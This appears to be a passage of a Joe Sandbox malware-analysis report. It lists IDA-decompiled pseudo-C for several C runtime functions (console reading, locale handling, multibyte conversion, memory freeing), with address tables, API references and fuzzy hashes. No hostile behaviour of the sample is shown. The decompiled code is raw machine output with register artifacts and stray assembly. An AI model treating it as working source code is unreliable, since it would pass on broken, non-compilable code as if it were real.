                0x00eafc17
                0x00eafc1e
                0x00eafc22
                0x00eafc24
                0x00eafc30
                0x00eafc32
                0x00eafc32
                0x00eafc26
                0x00eafc28
                0x00eafc28
                0x00000000
                0x00eafc24
                0x00eafafd
                0x00eafb00
                0x00eafb03
                0x00000000
                0x00000000
                0x00eafb05
                0x00000000
                0x00eafb05
                0x00eafa7c
                0x00eafa7c
                0x00eafa82
                0x00eafa83
                0x00000000
                0x00eafa88
                0x00eafa51
                0x00eafa2f
                0x00eaf913
                0x00eaf8f0
                0x00eaf8f5
                0x00eaf8d0
                0x00eaffcc
                0x00eaffd1
                0x00eaffd1
                0x00eaffd1
                0x00000000
                0x00eaf915
                0x00eaf915
                0x00000000
                0x00eaf915
                0x00eaf913

                APIs
                • __malloc_crt.LIBCMT ref: 00EAF933
                • GetConsoleMode.KERNEL32(00000080,?,?,?,00000001,00000000,?,?,?,?,?,?,00EB2B47,?,00000080,00000003), ref: 00EAFA46
                • ReadConsoleW.KERNEL32(?,?,G+,?,00000000,?,?,00000001,00000000,?,?,?,?,?,?,00EB2B47), ref: 00EAFA72
                • GetLastError.KERNEL32(?,?,?,?,?,?,00000001,00000000,?,?,?,?,?,?,00EB2B47,?), ref: 00EAFA7C
                • __dosmaperr.LIBCMT ref: 00EAFA83
                • _free.LIBCMT ref: 00EAFD52
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.448099573.0000000000EA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00EA0000, based on PE: true
                • Associated: 00000001.00000002.448093197.0000000000EA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                • Associated: 00000001.00000002.448197888.0000000000EC7000.00000002.00000001.01000000.00000004.sdmpDownload File
                • Associated: 00000001.00000002.448222329.0000000000ECE000.00000004.00000001.01000000.00000004.sdmpDownload File
                • Associated: 00000001.00000002.448230622.0000000000ED2000.00000002.00000001.01000000.00000004.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_ea0000_zrztlh.jbxd
                Similarity
                • API ID: Console$ErrorLastModeRead__dosmaperr__malloc_crt_free
                • String ID: G+$G+
                • API String ID: 3470617983-4250722411
                • Opcode ID: 9bc12f135d991661ec766742846922babf27493db312549ae8e0eb6085badcc1
                • Instruction ID: 8ad9a3cb26877d49196f97b2105841c718f8084deb61371a1af45866c828a03a
                • Opcode Fuzzy Hash: 9bc12f135d991661ec766742846922babf27493db312549ae8e0eb6085badcc1
                • Instruction Fuzzy Hash: 8C41F870E146858ECB26CF9D9C84BE9BBE1AF0B308F055175E858AF2B2C631DD0AC750
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00EA5641 Relevance: 12.1, APIs: 8, Instructions: 94COMMON
                Download Yara Rule
                C-Code - Quality: 65%
                			E00EA5641(void* __eax, intOrPtr __ebx, short __ecx, void* __edx, signed int __edi, signed int* __esi, void* __eflags) {
				void* _t39;
				signed int _t40;
				signed int _t43;
				void* _t46;
				signed int _t48;
				intOrPtr* _t52;
				signed int _t60;
				signed short _t61;
				signed int _t63;
				signed int _t64;
				signed int _t65;
				signed int _t67;
				intOrPtr _t70;
				signed int _t72;
				void* _t79;
				void* _t81;
				void* _t93;
				intOrPtr* _t96;
				void* _t97;
				signed int _t98;
				void* _t100;
				void* _t101;
				void* _t104;
				void* _t105;
				void* _t106;
				void* _t107;

				_t95 = __esi;
				_t92 = __edi;
				_t91 = __edx;
				_t82 = __ecx;
				_t80 = __ebx;
				asm("adc eax, [ecx+0x682af3]");
				 *((intOrPtr*)(__ecx + 0x5be9f3)) =  *((intOrPtr*)(__ecx + 0x5be9f3)) + __eax;
				 *((intOrPtr*)(__ecx + 0xa881e9)) =  *((intOrPtr*)(__ecx + 0xa881e9)) + __eax;
				 *((intOrPtr*)(__ecx - 0x7f)) =  *((intOrPtr*)(__ecx - 0x7f)) + __ecx;
				_push(__eax);
				_push(__edi);
				_push(__eax);
				if(__eflags == 0) {
					_t39 = E00EBE1D4(__ecx, __edx);
				} else {
					_t39 = E00EBEA44(__edx);
				}
				_t101 = _t100 + 0xc;
				if(_t39 == 0) {
					_t40 = E00EBA06A(_t95);
					_pop(_t82);
					__eflags = _t40;
					if(_t40 == 0) {
						_t43 = E00EB5727( *((intOrPtr*)(_t98 - 0x1e8)), 0x55, _t80, E00EB5609(_t80) + 1);
						__eflags = _t43;
						if(_t43 != 0) {
							goto L30;
						} else {
							__eflags = 0;
							goto L2;
						}
					} else {
						_t60 = E00EB9FDB(_t95, 0x20001004, _t98 - 0x1dc, 2);
						_t104 = _t101 + 0x10;
						__eflags = _t60;
						if(_t60 == 0) {
							L13:
							_t61 = GetACP();
							 *(_t98 - 0x1dc) = _t61;
						} else {
							_t61 =  *(_t98 - 0x1dc);
							__eflags = _t61;
							if(_t61 == 0) {
								goto L13;
							}
						}
						 *_t92 = _t61 & 0x0000ffff;
						_t92 =  *((intOrPtr*)(_t98 - 0x1e4)) + 1;
						_t63 = E00EB5727( *((intOrPtr*)(_t98 - 0x1d4)), 0x83, _t95,  *((intOrPtr*)(_t98 - 0x1e4)) + 1);
						_t105 = _t104 + 0x10;
						__eflags = _t63;
						if(_t63 != 0) {
							goto L30;
						} else {
							_t64 = E00EB5727(_t80,  *((intOrPtr*)(_t98 + 0x18)), _t95, _t92);
							_t106 = _t105 + 0x10;
							__eflags = _t64;
							if(_t64 != 0) {
								goto L30;
							} else {
								_t65 = E00EB5727( *((intOrPtr*)(_t98 - 0x1e8)), 0x55, _t95, _t92);
								_t107 = _t106 + 0x10;
								__eflags = _t65;
								if(_t65 != 0) {
									goto L30;
								} else {
									_t92 = 0x83;
									goto L18;
								}
							}
						}
					}
				} else {
					_t92 = 0x83;
					_push(_t98 - 0x1d0);
					E00EB7294(_t80, _t82, _t91, 0x83,  *((intOrPtr*)(_t98 - 0x1d4)), 0x83);
					_t107 = _t101 + 0xc;
					if(_t80 == 0) {
						L18:
						_t80 = 0;
						__eflags =  *_t95;
						if( *_t95 == 0) {
							L22:
							_t82 = 0;
							__eflags = 0;
							 *((short*)( *((intOrPtr*)(_t98 - 0x1e0)))) = 0;
							goto L23;
						} else {
							_t70 =  *((intOrPtr*)(_t98 - 0x1e4));
							__eflags = _t70 - _t92;
							if(_t70 >= _t92) {
								goto L22;
							} else {
								_t72 = E00EB5727( *((intOrPtr*)(_t98 - 0x1e0)), _t92, _t95, _t70 + 1);
								_t107 = _t107 + 0x10;
								__eflags = _t72;
								if(_t72 == 0) {
									L23:
									_t92 =  *(_t98 - 0x1f0);
									__eflags = _t92;
									if(_t92 != 0) {
										E00EB32E0(_t92,  *((intOrPtr*)(_t98 - 0x1d8)), 4);
										_t107 = _t107 + 0xc;
									}
									_t80 =  *((intOrPtr*)(_t98 - 0x1d4));
									_t95 =  *(_t98 - 0x1ec);
									_t67 = E00EB55AD( *(_t98 - 0x1ec),  *((intOrPtr*)(_t98 + 0x10)),  *((intOrPtr*)(_t98 - 0x1d4)));
									__eflags = _t67;
									if(_t67 != 0) {
										goto L30;
									} else {
										L2:
										_pop(_t93);
										_pop(_t97);
										__eflags =  *(_t98 - 4) ^ _t98;
										_pop(_t81);
										return E00EB1E0D(_t81,  *(_t98 - 4) ^ _t98, _t91, _t93, _t97);
									}
								} else {
									_push(0);
									_push(0);
									_push(0);
									_push(0);
									_push(0);
									goto L31;
								}
							}
						}
					} else {
						_t79 = E00EB5727(_t80,  *((intOrPtr*)(_t98 + 0x18)), _t98 - 0xb0, E00EB5609(_t98 - 0xb0) + 1);
						_t107 = _t107 + 0x14;
						if(_t79 == 0) {
							goto L18;
						} else {
							L30:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							L31:
							E00EAEB49(_t80, _t91);
							asm("int3");
							_push(8);
							_push(0xecc538);
							_t46 = E00EAF1E0(_t80, _t92, _t95);
							_t96 =  *((intOrPtr*)(_t98 + 8));
							if(_t96 != 0) {
								_t48 = E00EB20A9(_t82, 0xd);
								 *(_t98 - 4) =  *(_t98 - 4) & 0x00000000;
								_t84 =  *((intOrPtr*)(_t96 + 4));
								if( *((intOrPtr*)(_t96 + 4)) != 0) {
									asm("lock xadd [ecx], eax");
									if((_t48 | 0xffffffff) == 0 &&  *((intOrPtr*)(_t96 + 4)) != 0xeceac8) {
										E00EB2248( *((intOrPtr*)(_t96 + 4)));
										_pop(_t84);
									}
								}
								 *(_t98 - 4) = 0xfffffffe;
								E00EB78AF();
								if( *_t96 != 0) {
									E00EB20A9(_t84, 0xc);
									 *(_t98 - 4) = 1;
									E00EB4248( *_t96);
									_t52 =  *_t96;
									if(_t52 != 0 &&  *_t52 == 0 && _t52 != 0xece800) {
										E00EB40EE(_t52);
									}
									 *(_t98 - 4) = 0xfffffffe;
									E00EB78BB();
								}
								_t46 = E00EB2248(_t96);
							}
							return E00EAF225(_t46);
						}
					}
				}
			}





























                0x00ea5641
                0x00ea5641
                0x00ea5641
                0x00ea5641
                0x00ea5641
                0x00ea5641
                0x00ea5647
                0x00ea564d
                0x00ea5653
                0x00eb7659
                0x00eb765a
                0x00eb765b
                0x00eb765c
                0x00eb7665
                0x00eb765e
                0x00eb765e
                0x00eb765e
                0x00eb766a
                0x00eb766f
                0x00eb76c9
                0x00eb76ce
                0x00eb76cf
                0x00eb76d1
                0x00eb77ef
                0x00eb77f7
                0x00eb77f9
                0x00000000
                0x00eb77fb
                0x00eb7579
                0x00000000
                0x00eb7579
                0x00eb76d7
                0x00eb76e6
                0x00eb76eb
                0x00eb76ee
                0x00eb76f0
                0x00eb76fc
                0x00eb76fc
                0x00eb7702
                0x00eb76f2
                0x00eb76f2
                0x00eb76f8
                0x00eb76fa
                0x00000000
                0x00000000
                0x00eb76fa
                0x00eb770b
                0x00eb7713
                0x00eb7721
                0x00eb7726
                0x00eb7729
                0x00eb772b
                0x00000000
                0x00eb7731
                0x00eb7737
                0x00eb773c
                0x00eb773f
                0x00eb7741
                0x00000000
                0x00eb7747
                0x00eb7751
                0x00eb7756
                0x00eb7759
                0x00eb775b
                0x00000000
                0x00eb7761
                0x00eb7761
                0x00000000
                0x00eb7761
                0x00eb775b
                0x00eb7741
                0x00eb772b
                0x00eb7671
                0x00eb7677
                0x00eb767c
                0x00eb7684
                0x00eb7689
                0x00eb768e
                0x00eb7766
                0x00eb7766
                0x00eb7768
                0x00eb776b
                0x00eb7794
                0x00eb779a
                0x00eb779a
                0x00eb779c
                0x00000000
                0x00eb776d
                0x00eb776d
                0x00eb7773
                0x00eb7775
                0x00000000
                0x00eb7777
                0x00eb7781
                0x00eb7786
                0x00eb7789
                0x00eb778b
                0x00eb779f
                0x00eb779f
                0x00eb77a5
                0x00eb77a7
                0x00eb77b2
                0x00eb77b7
                0x00eb77b7
                0x00eb77ba
                0x00eb77c0
                0x00eb77cb
                0x00eb77d3
                0x00eb77d5
                0x00000000
                0x00eb77d7
                0x00eb757b
                0x00eb757e
                0x00eb757f
                0x00eb7580
                0x00eb7582
                0x00eb758b
                0x00eb758b
                0x00eb778d
                0x00eb778d
                0x00eb778e
                0x00eb778f
                0x00eb7790
                0x00eb7791
                0x00000000
                0x00eb7791
                0x00eb778b
                0x00eb7775
                0x00eb7694
                0x00eb76ad
                0x00eb76b2
                0x00eb76b7
                0x00000000
                0x00eb76bd
                0x00eb7800
                0x00eb7802
                0x00eb7803
                0x00eb7804
                0x00eb7805
                0x00eb7806
                0x00eb7807
                0x00eb7807
                0x00eb780c
                0x00eb780d
                0x00eb780f
                0x00eb7814
                0x00eb7819
                0x00eb781e
                0x00eb7826
                0x00eb782c
                0x00eb7830
                0x00eb7835
                0x00eb783a
                0x00eb783e
                0x00eb784c
                0x00eb7851
                0x00eb7851
                0x00eb783e
                0x00eb7852
                0x00eb7859
                0x00eb7861
                0x00eb7865
                0x00eb786b
                0x00eb7874
                0x00eb787a
                0x00eb787e
                0x00eb788d
                0x00eb7892
                0x00eb7893
                0x00eb789a
                0x00eb789a
                0x00eb78a0
                0x00eb78a5
                0x00eb78ab
                0x00eb78ab
                0x00eb76b7
                0x00eb768e

                APIs
                • ___get_qualified_locale_downlevel.LIBCMT ref: 00EB765E
                  • Part of subcall function 00EBEA44: _memset.LIBCMT ref: 00EBEA7A
                  • Part of subcall function 00EBEA44: GetUserDefaultLCID.KERNEL32(?,?,00000055), ref: 00EBEB5D
                  • Part of subcall function 00EBEA44: IsValidCodePage.KERNEL32(00000000), ref: 00EBEBB1
                  • Part of subcall function 00EBEA44: IsValidLocale.KERNEL32(?,00000001), ref: 00EBEBC4
                  • Part of subcall function 00EBEA44: ___crtDownlevelLCIDToLocaleName.LIBCMT ref: 00EBEBE3
                  • Part of subcall function 00EBEA44: ___crtDownlevelLCIDToLocaleName.LIBCMT ref: 00EBEBFE
                  • Part of subcall function 00EBEA44: GetLocaleInfoW.KERNEL32(?,00001001,?,00000040), ref: 00EBEC17
                  • Part of subcall function 00EBEA44: GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 00EBEC2E
                • ___get_qualified_locale.LIBCMT ref: 00EB7665
                • __invoke_watson.LIBCMT ref: 00EB7807
                • __lock.LIBCMT ref: 00EB7826
                • _free.LIBCMT ref: 00EB784C
                • __lock.LIBCMT ref: 00EB7865
                • ___removelocaleref.LIBCMT ref: 00EB7874
                • ___freetlocinfo.LIBCMT ref: 00EB788D
                • _free.LIBCMT ref: 00EB78A0
                Memory Dump Source
                • Source File: 00000001.00000002.448099573.0000000000EA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00EA0000, based on PE: true
                • Associated: 00000001.00000002.448093197.0000000000EA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                • Associated: 00000001.00000002.448197888.0000000000EC7000.00000002.00000001.01000000.00000004.sdmpDownload File
                • Associated: 00000001.00000002.448222329.0000000000ECE000.00000004.00000001.01000000.00000004.sdmpDownload File
                • Associated: 00000001.00000002.448230622.0000000000ED2000.00000002.00000001.01000000.00000004.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_ea0000_zrztlh.jbxd
                Similarity
                • API ID: Locale$DownlevelInfoNameValid___crt__lock_free$CodeDefaultPageUser___freetlocinfo___get_qualified_locale___get_qualified_locale_downlevel___removelocaleref__invoke_watson_memset
                • String ID:
                • API String ID: 326597126-0
                • Opcode ID: 74ceaa93ed26513bf724ab8611d67c8cecb507a695a828ee7681fd132f52846a
                • Instruction ID: 225c511abe74d94d6a60d0bfd0a376a575d76ec378454b8244fe096110d399d4
                • Opcode Fuzzy Hash: 74ceaa93ed26513bf724ab8611d67c8cecb507a695a828ee7681fd132f52846a
                • Instruction Fuzzy Hash: A6313971509315AADB38ABA09D0AFEB33E8AF80314F18356EF494B69D2CF35DE41C651
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00EA6AE0 Relevance: 9.1, APIs: 6, Instructions: 106COMMON
                Download Yara Rule
                C-Code - Quality: 83%
                			E00EA6AE0(void* __ecx, signed int __edx) {
				intOrPtr _t44;
				void* _t56;
				void* _t62;
				signed int _t72;
				signed int _t73;
				signed int _t76;
				intOrPtr _t78;
				signed int _t83;
				void* _t84;

				_t76 = __edx;
				_t62 = E00EB22C8(__ecx, __edx);
				_t87 = _t62;
				if(_t62 == 0) {
					L24:
					return E00EAF225(_t78);
				} else {
					memcpy(_t62,  *( *((intOrPtr*)(_t84 - 0x20)) + 0x68), 0x88 << 2);
					_t83 = 0;
					 *_t62 = 0;
					_t78 = E00EB48E9(_t76,  *( *((intOrPtr*)(_t84 - 0x20)) + 0x68) + 0x110, _t87,  *((intOrPtr*)(_t84 + 8)), _t62);
					 *((intOrPtr*)(_t84 + 8)) = _t78;
					if(_t78 != 0) {
						__eflags = _t78 - 0xffffffff;
						if(_t78 == 0xffffffff) {
							__eflags = _t62 - 0xeceac8;
							if(_t62 != 0xeceac8) {
								E00EB2248(_t62);
							}
							 *((intOrPtr*)(E00EAF100())) = 0x16;
						}
						goto L24;
					}
					_t44 =  *((intOrPtr*)(_t84 - 0x20));
					_t70 =  *(_t44 + 0x68);
					asm("lock xadd [ecx], edx");
					if((_t76 | 0xffffffff) == 0) {
						_t70 =  *(_t44 + 0x68);
						if( *(_t44 + 0x68) != 0xeceac8) {
							E00EB2248(_t70);
							_pop(_t70);
							_t44 =  *((intOrPtr*)(_t84 - 0x20));
						}
					}
					 *(_t44 + 0x68) = _t62;
					asm("lock xadd [ebx], eax");
					if(( *( *((intOrPtr*)(_t84 - 0x20)) + 0x70) & 0x00000002) == 0 && ( *0xecee10 & 0x00000001) == 0) {
						E00EB20A9(_t70, 0xd);
						 *(_t84 - 4) = _t83;
						 *0xecfcd4 =  *((intOrPtr*)(_t62 + 4));
						 *0xecfcd8 =  *((intOrPtr*)(_t62 + 8));
						 *0xecfce8 =  *((intOrPtr*)(_t62 + 0x21c));
						_t72 = _t83;
						while(1) {
							 *(_t84 - 0x1c) = _t72;
							if(_t72 >= 5) {
								break;
							}
							 *((short*)(0xecfcdc + _t72 * 2)) =  *((intOrPtr*)(_t62 + 0xc + _t72 * 2));
							_t72 = _t72 + 1;
						}
						_t73 = _t83;
						while(1) {
							 *(_t84 - 0x1c) = _t73;
							__eflags = _t73 - 0x101;
							if(_t73 >= 0x101) {
								goto L14;
							}
							 *((char*)(_t73 + 0xece8c0)) =  *((intOrPtr*)(_t73 + _t62 + 0x18));
							_t73 = _t73 + 1;
						}
						while(1) {
							L14:
							 *(_t84 - 0x1c) = _t83;
							__eflags = _t83 - 0x100;
							if(_t83 >= 0x100) {
								break;
							}
							 *((char*)(_t83 + 0xece9c8)) =  *((intOrPtr*)(_t83 + _t62 + 0x119));
							_t83 = _t83 + 1;
						}
						__eflags = _t73 | 0xffffffff;
						asm("lock xadd [eax], ecx");
						if((_t73 | 0xffffffff) == 0) {
							_t56 =  *0xececec; // 0x910660
							__eflags = _t56 - 0xeceac8;
							if(_t56 != 0xeceac8) {
								E00EB2248(_t56);
							}
						}
						 *0xececec = _t62;
						asm("lock xadd [ebx], eax");
						 *(_t84 - 4) = 0xfffffffe;
						E00EB48B3();
					}
					goto L24;
				}
			}












                0x00ea6ae0
                0x00eb4782
                0x00eb4784
                0x00eb4786
                0x00eb48e1
                0x00eb48e8
                0x00eb478c
                0x00eb4799
                0x00eb479b
                0x00eb479d
                0x00eb47aa
                0x00eb47ac
                0x00eb47b1
                0x00eb48be
                0x00eb48c1
                0x00eb48c3
                0x00eb48c9
                0x00eb48cc
                0x00eb48d1
                0x00eb48d7
                0x00eb48d7
                0x00000000
                0x00eb48c1
                0x00eb47b7
                0x00eb47ba
                0x00eb47c0
                0x00eb47c4
                0x00eb47c6
                0x00eb47cf
                0x00eb47d2
                0x00eb47d7
                0x00eb47d8
                0x00eb47d8
                0x00eb47cf
                0x00eb47db
                0x00eb47e1
                0x00eb47ec
                0x00eb4801
                0x00eb4807
                0x00eb480d
                0x00eb4815
                0x00eb4820
                0x00eb4825
                0x00eb4827
                0x00eb4827
                0x00eb482d
                0x00000000
                0x00000000
                0x00eb4834
                0x00eb483c
                0x00eb483c
                0x00eb483f
                0x00eb4841
                0x00eb4841
                0x00eb4844
                0x00eb484a
                0x00000000
                0x00000000
                0x00eb4850
                0x00eb4856
                0x00eb4856
                0x00eb4859
                0x00eb4859
                0x00eb4859
                0x00eb485c
                0x00eb4862
                0x00000000
                0x00000000
                0x00eb486b
                0x00eb4871
                0x00eb4871
                0x00eb4879
                0x00eb487c
                0x00eb4880
                0x00eb4882
                0x00eb4887
                0x00eb488c
                0x00eb488f
                0x00eb4894
                0x00eb488c
                0x00eb4895
                0x00eb489e
                0x00eb48a2
                0x00eb48a9
                0x00eb48a9
                0x00000000
                0x00eb47ec

                APIs
                • __malloc_crt.LIBCMT ref: 00EB477C
                  • Part of subcall function 00EB22C8: _malloc.LIBCMT ref: 00EB22D9
                • __setmbcp_nolock.LIBCMT ref: 00EB47A3
                  • Part of subcall function 00EB48E9: getSystemCP.LIBCMT ref: 00EB4901
                  • Part of subcall function 00EB48E9: setSBCS.LIBCMT ref: 00EB490E
                • _free.LIBCMT ref: 00EB47D2
                  • Part of subcall function 00EB2248: HeapFree.KERNEL32(00000000,00000000,?,00EB060D,00000000,?,00ECE000), ref: 00EB225C
                  • Part of subcall function 00EB2248: GetLastError.KERNEL32(00000000,?,00EB060D,00000000,?,00ECE000), ref: 00EB226E
                • __lock.LIBCMT ref: 00EB4801
                • _free.LIBCMT ref: 00EB488F
                • _free.LIBCMT ref: 00EB48CC
                Memory Dump Source
                • Source File: 00000001.00000002.448099573.0000000000EA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00EA0000, based on PE: true
                • Associated: 00000001.00000002.448093197.0000000000EA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                • Associated: 00000001.00000002.448197888.0000000000EC7000.00000002.00000001.01000000.00000004.sdmpDownload File
                • Associated: 00000001.00000002.448222329.0000000000ECE000.00000004.00000001.01000000.00000004.sdmpDownload File
                • Associated: 00000001.00000002.448230622.0000000000ED2000.00000002.00000001.01000000.00000004.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_ea0000_zrztlh.jbxd
                Similarity
                • API ID: _free$ErrorFreeHeapLastSystem__lock__malloc_crt__setmbcp_nolock_malloc
                • String ID:
                • API String ID: 3263399035-0
                • Opcode ID: 290df9d7e024dc7a20263ac9bb4716107a55e701004fd956227c60a13467f8b2
                • Instruction ID: 5b47843d5672c3e6c1e9ddbe36e0649cf0816162a67ac3f501faebf8120e6b0e
                • Opcode Fuzzy Hash: 290df9d7e024dc7a20263ac9bb4716107a55e701004fd956227c60a13467f8b2
                • Instruction Fuzzy Hash: 9D41DAB4A002848FDB19DF68D481AEA77E4BB05324B14516DF955BB7E3CB359C42CB90
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00EBA436 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 97COMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 100%
                			E00EBA436(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				intOrPtr _v12;
				signed int _v20;
				signed int _t35;
				int _t38;
				signed int _t41;
				int _t42;
				intOrPtr* _t44;
				int _t47;
				short* _t49;
				intOrPtr _t50;
				intOrPtr _t54;
				int _t55;
				signed int _t59;
				char* _t62;

				_t62 = _a8;
				if(_t62 == 0) {
					L5:
					return 0;
				}
				_t50 = _a12;
				if(_t50 == 0) {
					goto L5;
				}
				if( *_t62 != 0) {
					E00EB2DB9( &_v20, _a16);
					_t35 = _v20;
					__eflags =  *(_t35 + 0xa8);
					if( *(_t35 + 0xa8) != 0) {
						_t38 = E00EBA1C7( *_t62 & 0x000000ff,  &_v20);
						__eflags = _t38;
						if(_t38 == 0) {
							__eflags = _a4;
							_t41 = _v20;
							_t59 = 1;
							_t28 = _t41 + 4; // 0x840ffff8
							_t42 = MultiByteToWideChar( *_t28, 9, _t62, 1, _a4, 0 | _a4 != 0x00000000);
							__eflags = _t42;
							if(_t42 != 0) {
								L21:
								__eflags = _v8;
								if(_v8 != 0) {
									_t54 = _v12;
									_t31 = _t54 + 0x70;
									 *_t31 =  *(_t54 + 0x70) & 0xfffffffd;
									__eflags =  *_t31;
								}
								return _t59;
							}
							L20:
							_t44 = E00EAF100();
							_t59 = _t59 | 0xffffffff;
							__eflags = _t59;
							 *_t44 = 0x2a;
							goto L21;
						}
						_t59 = _v20;
						__eflags =  *(_t59 + 0x74) - 1;
						if( *(_t59 + 0x74) <= 1) {
							L15:
							_t20 = _t59 + 0x74; // 0xe1c11fe1
							__eflags = _t50 -  *_t20;
							L16:
							if(__eflags < 0) {
								goto L20;
							}
							__eflags = _t62[1];
							if(_t62[1] == 0) {
								goto L20;
							}
							L18:
							_t22 = _t59 + 0x74; // 0xe1c11fe1
							_t59 =  *_t22;
							goto L21;
						}
						_t12 = _t59 + 0x74; // 0xe1c11fe1
						__eflags = _t50 -  *_t12;
						if(__eflags < 0) {
							goto L16;
						}
						__eflags = _a4;
						_t17 = _t59 + 0x74; // 0xe1c11fe1
						_t18 = _t59 + 4; // 0x840ffff8
						_t47 = MultiByteToWideChar( *_t18, 9, _t62,  *_t17, _a4, 0 | _a4 != 0x00000000);
						_t59 = _v20;
						__eflags = _t47;
						if(_t47 != 0) {
							goto L18;
						}
						goto L15;
					}
					_t55 = _a4;
					__eflags = _t55;
					if(_t55 != 0) {
						 *_t55 =  *_t62 & 0x000000ff;
					}
					_t59 = 1;
					goto L21;
				}
				_t49 = _a4;
				if(_t49 != 0) {
					 *_t49 = 0;
				}
				goto L5;
			}


















                0x00eba43e
                0x00eba443
                0x00eba45d
                0x00000000
                0x00eba45d
                0x00eba445
                0x00eba44a
                0x00000000
                0x00000000
                0x00eba44f
                0x00eba46c
                0x00eba471
                0x00eba474
                0x00eba47b
                0x00eba49a
                0x00eba4a1
                0x00eba4a3
                0x00eba4e7
                0x00eba4f3
                0x00eba4f6
                0x00eba4fb
                0x00eba4fe
                0x00eba504
                0x00eba506
                0x00eba516
                0x00eba516
                0x00eba51a
                0x00eba51c
                0x00eba51f
                0x00eba51f
                0x00eba51f
                0x00eba51f
                0x00000000
                0x00eba525
                0x00eba508
                0x00eba508
                0x00eba50d
                0x00eba50d
                0x00eba510
                0x00000000
                0x00eba510
                0x00eba4a5
                0x00eba4a8
                0x00eba4ac
                0x00eba4d5
                0x00eba4d5
                0x00eba4d5
                0x00eba4d8
                0x00eba4d8
                0x00000000
                0x00000000
                0x00eba4da
                0x00eba4de
                0x00000000
                0x00000000
                0x00eba4e0
                0x00eba4e0
                0x00eba4e0
                0x00000000
                0x00eba4e0
                0x00eba4ae
                0x00eba4ae
                0x00eba4b1
                0x00000000
                0x00000000
                0x00eba4b5
                0x00eba4bf
                0x00eba4c5
                0x00eba4c8
                0x00eba4ce
                0x00eba4d1
                0x00eba4d3
                0x00000000
                0x00000000
                0x00000000
                0x00eba4d3
                0x00eba47d
                0x00eba480
                0x00eba482
                0x00eba487
                0x00eba487
                0x00eba48c
                0x00000000
                0x00eba48c
                0x00eba451
                0x00eba456
                0x00eba45a
                0x00eba45a
                0x00000000

                APIs
                • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00EBA46C
                • __isleadbyte_l.LIBCMT ref: 00EBA49A
                • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,E1C11FE1,00BFBBEF,00000000), ref: 00EBA4C8
                • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,00000001,00BFBBEF,00000000), ref: 00EBA4FE
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.448099573.0000000000EA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00EA0000, based on PE: true
                • Associated: 00000001.00000002.448093197.0000000000EA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                • Associated: 00000001.00000002.448197888.0000000000EC7000.00000002.00000001.01000000.00000004.sdmpDownload File
                • Associated: 00000001.00000002.448222329.0000000000ECE000.00000004.00000001.01000000.00000004.sdmpDownload File
                • Associated: 00000001.00000002.448230622.0000000000ED2000.00000002.00000001.01000000.00000004.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_ea0000_zrztlh.jbxd
                Similarity
                • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                • String ID: >,
                • API String ID: 3058430110-1189350311
                • Opcode ID: a975d527b8109d81b9a55d9f50db0c0c35dda6eb7e6c78e679fadb0cb3c61c5c
                • Instruction ID: 3f7fa0d411fbacbc6bf87f3495abeb898d0c7c80f3767f1aabdf3aa844e6c0e9
                • Opcode Fuzzy Hash: a975d527b8109d81b9a55d9f50db0c0c35dda6eb7e6c78e679fadb0cb3c61c5c
                • Instruction Fuzzy Hash: 9831CF30600246AFDF218F65C848BFB7BA5FF41314F199139F865A7190E770E950DB92
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00EB721D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 91COMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 60%
                			E00EB721D(void* __ebx, void* __edi, intOrPtr _a4) {
				char* _v24;
				intOrPtr _v28;
				signed int _v36;
				signed int _v40;
				short _v300;
				void* __esi;
				void* _t15;
				void* _t17;
				signed int _t20;
				char* _t22;
				signed int _t30;
				void* _t33;
				void* _t40;
				void* _t42;
				void* _t46;
				void* _t47;
				void* _t49;
				void* _t51;
				signed int _t52;

				if(_a4 != 0) {
					_push(__ebx);
					_t30 = E00EBDBB1(_a4, 0x55);
					_pop(_t33);
					if(_t30 < 0x55) {
						_push(__edi);
						_t15 = E00EB22C8(_t33, _t40, 2 + _t30 * 2);
						_t42 = _t15;
						if(_t42 != 0) {
							_t5 = _t30 + 1; // 0x1
							_t17 = E00EB5727(_t42, _t5, _a4, _t5);
							_t52 = _t51 + 0x10;
							if(_t17 != 0) {
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								E00EAEB49(_t30, _t40);
								asm("int3");
								_t49 = _t47;
								_push(_t49);
								_t50 = _t52;
								_t20 =  *0xece400; // 0x41bad13e
								_v40 = _t20 ^ _t52;
								_t22 = _v24;
								_t45 = _v28;
								if(_v28 <= 5 && _t22 != 0 && MultiByteToWideChar(0, 0, _t22, 0xffffffff,  &_v300, 0x83) != 0) {
									E00EB7973(_t30, _t40, _t45,  &_v300);
								}
								_pop(_t46);
								return E00EB1E0D(_t30, _v36 ^ _t50, _t40, _t42, _t46);
							} else {
								_t15 = _t42;
								goto L5;
							}
						} else {
							L5:
							goto L6;
						}
					} else {
						_t15 = 0;
						L6:
						return _t15;
					}
				} else {
					return 0;
				}
			}






















                0x00eb7224
                0x00eb722a
                0x00eb7235
                0x00eb7238
                0x00eb723c
                0x00eb7249
